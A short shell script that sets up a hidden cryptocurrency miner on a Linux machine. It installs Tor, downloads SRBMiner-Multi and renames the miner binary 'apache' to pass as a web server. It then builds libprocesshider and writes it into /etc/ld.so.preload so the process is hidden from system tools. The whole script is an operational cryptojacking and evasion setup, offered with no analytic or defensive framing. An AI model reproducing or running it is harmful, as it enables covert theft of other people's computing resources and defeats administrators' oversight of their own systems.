#!/bin/sh
sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata
sudo apt update
sudo apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential nano git screen wget tor
sudo service tor start

wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.9.5/SRBMiner-Multi-0-9-5-Linux.tar.xz
tar -xf SRBMiner-Multi-0-9-5-Linux.tar.xz
cd SRBMiner-Multi-0-9-5-Linux
mv SRBMiner-MULTI ../apache
cd ..

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..

screen -R
